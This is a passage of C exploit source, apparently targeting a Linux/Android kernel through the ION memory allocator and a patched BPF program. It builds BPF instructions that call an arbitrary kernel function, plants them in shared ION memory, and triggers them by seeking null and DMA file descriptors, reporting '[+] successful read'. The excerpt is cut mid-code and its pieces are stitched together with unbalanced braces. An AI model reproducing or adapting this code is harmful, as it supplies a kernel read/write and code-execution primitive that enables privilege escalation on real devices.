			/* 14 */ BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6, bpf_arg0),
			// Load R2 = *(in:data + 18); this is the second argument.
			/* 15 */ BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_6, bpf_arg1),
			// Load R3 = *(in:data + 20); this is the third argument.
			/* 16 */ BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_6, bpf_arg2),
			// Load R4 = *(in:data + 28); this is the fourth argument.
			/* 17 */ BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_6, bpf_arg3),
			// Load R5 = *(in:data + 30); this is the fifth argument.
			/* 18 */ BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_6, bpf_arg4),
			// Call R0 = function(R1, R2, R3, R4, R5). This call gets patched.
			/* 19 */ BPF_EMIT_CALL(__bpf_call_base - 4),
			// Store *(out:data + 8) = R0.
			/* 20 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0x108),
			// Done. Fallthrough.

			// Store *(out:data + 0) = R7, i.e., record the operation that we just executed.
			/* 21 */ BPF_STX_MEM(BPF_DW, BPF_REG_6, BPF_REG_7, 0x100),
		};
//------------------------------------------------------------------------------------------------------------------
        while (1) {
          ion_alloc_fds[0] = init_tmp_region(ion_fd, &(tmp_ion_regions[0]), &ion_region);
		  do_one_rw(DMA_ADDRESS, SYS_LEN * (region_index + 1), regions, ion_region, &(ion_alloc_fds[0]), 1);
       printf("running bpf program\n");
        
        unsigned long bpf_insn_addr = ion_addr + 1024;
        memcpy(&(ion_sys_regions[1][1024]), insn, sizeof(insn));
        bpf_data[128] = 12345;
        //set up read
		bpf_data[bpf_op_offset/8] = 'r';
        bpf_data[bpf_rw_addr_offset/8] = bpf_data_address + 1024;
        switch(type) {
          case null:
            for (int i = 0; i < SLAB_LEN; i++) {
              lseek64(p.null_fds[i], bpf_insn_addr, 0);
            }
            break;
          case dma:
            for (int i = 0; i < REGIONS_LEN_1; i++) {
              lseek64(ion_sys_fds[i], bpf_insn_addr, 0);
            }
            for (int i = 0; i < REGIONS_LEN_2; i++) {
              lseek64(ion_sys_fds2[i], bpf_insn_addr, 0);
            }
            break;
          default:
            break;
        }
        printf("bpf_data 0x%lx\n", bpf_data[bpf_out_offset/8]);
        if (bpf_data[bpf_out_offset/8] == 12345) {
          printf("[+] successful read\n");
          break;
        }
      }
      break;
      }
    }
    munmap(tmp_ion_regions[0], ion_region_size0);
    munmap(ion_region, 0x1000);
    for (int i = 0; i < VMAS_LEN; i++) {
      munmap(tmp_ion_regions[i + 1], 0x1000);
    }
    sleep(5);
  }

  for (int i = 0; i < 3; i++) {
    close(ion_alloc_fds[i]);
  }

  close(ion_fd);
  
  for (int i = 0; i < BOUNCE_LEN; i++) {
    munmap(bounce_regions[i], SYS_LEN);
  }
}
